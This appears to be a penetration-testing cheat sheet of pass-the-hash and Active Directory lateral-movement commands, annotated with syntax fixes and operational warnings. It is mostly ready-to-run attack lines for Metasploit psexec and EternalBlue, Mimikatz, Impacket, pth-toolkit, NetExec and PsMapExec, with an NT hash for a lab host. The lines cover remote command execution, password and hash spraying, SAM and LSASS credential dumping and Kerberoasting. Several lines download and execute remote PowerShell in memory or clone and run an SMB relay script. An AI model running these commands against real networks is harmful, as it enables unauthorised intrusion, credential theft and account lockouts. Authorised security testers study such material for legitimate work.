MSF (Metasploit Framework — msfconsole)

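# msfconsole: pass-the-hash with the psexec module.
# EternalBlue (MS17-010) is an unauthenticated RCE, unrelated to PtH — it needs no hash
# and is listed only as an alternative way in on unpatched hosts.
use exploit/windows/smb/ms17_010_eternalblue

# psexec takes the hash in SMBPass as LM:NT; the 32 zeros are a placeholder LM half
# (only the NT half is used). The original omitted RHOSTS/SMBUser/SMBDomain, without
# which the module cannot authenticate. Needs local-admin rights on the target.
# Option names are case-insensitive in msfconsole; canonical casing kept for clarity.
use exploit/windows/smb/psexec
set RHOSTS 192.168.1.105
set SMBUser Administrator
set SMBDomain ignite.local
set SMBPass 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38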

Mimikatz (run from an elevated prompt: privilege::debug needs SeDebugPrivilege; sekurlsa::pth spawns a new process — cmd.exe unless /run: is given — with the injected NT hash, so use that process for the network access)

privilege::debug
sekurlsa::pth /user:Administrator /domain:ignite.local /ntlm:32196B56FFE6F45E294117B91A83BF38

Impacket (plus the pth-toolkit / CrackMapExec equivalents)

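#SMB
# Impacket's -hashes takes LM:NT; the 32 zeros are a placeholder LM half (":NTHASH" with an
# empty LM part works too). Hashes passed on the command line land in shell history and
# are visible in `ps` to other local users — prefer a throwaway shell / HISTFILE= on shared hosts.
# The target was restored from the scrubbed "[email protected]" placeholder in the
# original notes: user Administrator on 192.168.1.105, matching the pth-/crackmapexec lines.
python smbclient.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/Administrator@192.168.1.105
# psexec.py installs a temporary service on the target (noisy); needs admin rights.
python psexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 Administrator@192.168.1.105
# pth-toolkit (patched samba tools): credentials go as one user%LM:NT argument.
pth-smbclient -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.105/c$
# CrackMapExec takes only the NT hash (-H); -x runs a command on the host (needs admin).
crackmapexec smb 192.168.1.105 -u Administrator -H 32196B56FFE6F45E294117B91A83BF38 -x ipconfig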

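#WMI
# Semi-interactive shell over WMI (DCOM); output travels over SMB (ADMIN$) by default, so
# 445 must also be reachable. Target restored from the scrubbed "[email protected]"
# placeholder: Administrator@192.168.1.105 as on the pth-wmic line.
python wmiexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 Administrator@192.168.1.105
# One-shot WQL query with the pth-toolkit build of wmic.
pth-wmic -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.105 "select Name from Win32_UserAccount"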
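#win
# Invoke-TheHash from a Windows box. The original line only fetched the file (wget is an
# alias of Invoke-WebRequest in Windows PowerShell and, without -OutFile, does not even save
# it) and never loaded it, so Invoke-WMIExec would be an unknown command. Load it in-memory
# instead — or download, read, then dot-source it. Executing whatever is on `master` is a
# supply-chain risk; pin a reviewed commit SHA in the URL where possible.
IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-WMIExec.ps1')
# -Hash is the NT hash alone. Single backslash in the path (the doubled one was an export artifact).
Invoke-WMIExec -Target 192.168.1.105 -Domain ignite -Username Administrator -Hash 32196B56FFE6F45E294117B91A83BF38 -Command "cmd /c mkdir c:\hacked" -Verbose
# Impacket's Windows build: same LM:NT argument form as wmiexec.py; target restored from
# the scrubbed "[email protected]" placeholder.
wmiexec.exe -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/Administrator@192.168.1.105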

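#RPC
# Enumerate exposed RPC endpoints (DCE/RPC endpoint mapper). Target restored from the
# scrubbed "[email protected]" placeholder: ignite/Administrator@192.168.1.105.
python rpcdump.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/Administrator@192.168.1.105
# Interactive rpcclient session with the hash (pth-toolkit).
pth-rpcclient -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.105
# Inside single quotes a backslash is literal, so DOMAIN\user needs exactly one; the
# doubled backslash in the original was an export artifact and would have been sent verbatim.
pth-net rpc share list -U 'ignite\Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38' -S 192.168.1.105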

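#Other
# winexe installs a temporary service on the target, like psexec (noisy, needs admin).
pth-winexe -U Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.105 cmd.exe
# NTLM-authenticated HTTP with the NT hash alone. The markdown <...> around the URL was
# stripped: in a shell it would be parsed as input/output redirections, not an argument.
pth-curl --ntlm -u Administrator:32196B56FFE6F45E294117B91A83BF38 http://192.168.1.105/file.txt
# atexec runs the command through a scheduled task (leaves a task-creation trail on the host).
# Targets below restored from the scrubbed "[email protected]" placeholder.
python atexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 Administrator@192.168.1.105 whoami
# SID brute-force of local/domain accounts via LSARPC.
python lookupsid.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/Administrator@192.168.1.105
# User enumeration via SAMR.
python samrdump.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/Administrator@192.168.1.105
# Remote registry read. The key is single-quoted so each backslash is passed literally once;
# the original's quadruple backslashes (an escaping artifact) would have produced "HKLM\\SOFTWARE...".
python reg.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/Administrator@192.168.1.105 query -keyName 'HKLM\SOFTWARE\Policies\Microsoft\Windows' -s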

SMB Relay Attack Script

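# Third-party SMB relay helper. The markdown <...> around the URL was stripped: in a shell
# `git clone <https://...>` is parsed as redirections and fails.
git clone https://github.com/m4lal0/smbrelay
# Don't chain `cd` with `;` — if the clone failed, the chmod/install would run in the wrong directory.
cd smbrelay || exit 1
chmod +x smbrelay.sh
# --install presumably pulls dependencies and may need root: read the script before running
# it — you are executing unreviewed code from an unpinned default branch.
./smbrelay.sh --install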


MUT

❌ CrackMapExec — archived, no longer maintained (use its fork NetExec below; the CLI is the same)

✅ NetExec (Linux/MacOS)


# Install NetExec via pipx (isolated virtualenv; puts the nxc/netexec entry points on PATH).
# apt needs root — prefix with sudo if you are not already root.
apt install pipx git
# Adds pipx's bin directory to PATH; takes effect in a new shell (or after re-sourcing the profile).
pipx ensurepath
# Unpinned: installs whatever is at the tip of the default branch. For repeatable engagements
# pin a tag or commit (git+https://...@<ref>) and review what you are installing.
pipx install git+https://github.com/Pennyw0rth/NetExec

//Start
- NetExec
- nxc
- nxcdb
- netexec

#DB
# nxcdb is the interactive shell over NetExec's host/credential database; the lines below
# are typed at its prompt (the first launches it; `help` lists the available commands).
nxcdb help
# Workspaces keep hosts and credentials of different engagements apart: list them, switch
# to one, then select the protocol whose tables you want to query.
workspace list
workspace HTB
proto smb

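#Usage
# CrackMapExec is marked as no longer maintained above and NetExec is its drop-in replacement,
# so the binary is `nxc` (same flags). Plaintext credentials on the command line end up in
# shell history and `ps` output.
# users.txt x passwords.txt tries every combination (a spray): check the lockout policy
# first (see --pass-pol below) and use --no-bruteforce when the two files are paired
# user:password lines. grep '[+]' keeps only successful logins.
nxc smb targets.txt -u users.txt -p passwords.txt --continue-on-success | grep '[+]'

#Passwords Policy
# Read the domain password/lockout policy before any spraying.
nxc smb targets.txt -u User -p P@ssw0rd --pass-pol
# Enumeration with a valid account: local groups, domain groups, domain users.
nxc smb targets.txt -u User -p P@ssw0rd --local-groups
nxc smb targets.txt -u User -p P@ssw0rd --groups
nxc smb targets.txt -u User -p P@ssw0rd --users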

PsMapExec (Windows — PowerShell, run from a domain-joined host)




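# Load PsMapExec in-memory. The markdown <...> around the URL was stripped (it would be part
# of the string and the download would 404). Executing whatever is currently on `main` is a
# supply-chain risk: prefer a reviewed, pinned commit (replace /main/ with a commit SHA) or a
# local copy you have read, and expect AMSI/EDR to inspect the script on load.
IEX (New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")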

// Examples (square-bracketed values are placeholders to substitute)
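# PsMapExec examples. [Hash], [Password] and [Base64-Ticket] are placeholders — substitute
# real values; a bare [Hash] would otherwise be parsed by PowerShell as a type literal.
# Named target sets (all, Workstations, DCs, "Domain Admins", "AdminCount=1") appear to be
# resolved from Active Directory, so these are meant to run from a domain-joined context.

# Execute WMI commands over all systems in the domain using password authentication
PsMapExec -Targets all -Method WMI -Username Admin -Password Pass -Command whoami

# Execute WinRM commands over all systems in the domain using hash authentication (NT hash)
PsMapExec -Targets all -Method WinRM -Username Admin -Hash [Hash] -Command whoami

# Check RDP Access against workstations in the domain and using local authentication
PsMapExec -Targets Workstations -Method RDP -Username LocalAdmin -Password Pass -LocalAuth

# Dump SAM on a single system using SMB and a -ticket for authentication
PsMapExec -Targets DC01.Security.local -Method SMB -Ticket [Base64-Ticket] -Module SAM

# Check SMB Signing on all domain systems (hosts without signing required are relay candidates)
PsMapExec -Targets All -Method GenRelayList

# Dump LogonPasswords on all Domain Controllers over WinRM
# (presumably LSASS credential dumping — high-signal for EDR; only when explicitly in scope)
PsMapExec -Targets DCs -Method WinRM -Username Admin -Password Pass -Module LogonPasswords

# Use WMI to check current user admin access from systems read from a text file
# (single backslashes — the doubled ones in the original were an export artifact)
PsMapExec -Targets C:\temp\Systems.txt -Method WMI

# Spray passwords across all accounts in the domain
# Spraying every account can lock users out: check the lockout threshold/window first.
PsMapExec -Method Spray -SprayPassword [Password]

# Spray Hashes across all accounts in the domain that have AdminCount=1
PsMapExec -Targets "AdminCount=1" -Method Spray -SprayHash [Hash]

# Spray Hashes across all Domain Admin group users
PsMapExec -Targets "Domain Admins" -Method Spray -SprayHash [Hash]

# Kerberoast (requests service tickets for SPN accounts; crack offline)
PsMapExec -Method Kerberoast -ShowOutput

# IPMI (BMC enumeration across a subnet; -Targets here is a CIDR, not an AD set)
PsMapExec -Targets 192.168.1.0/24 -Method IPMI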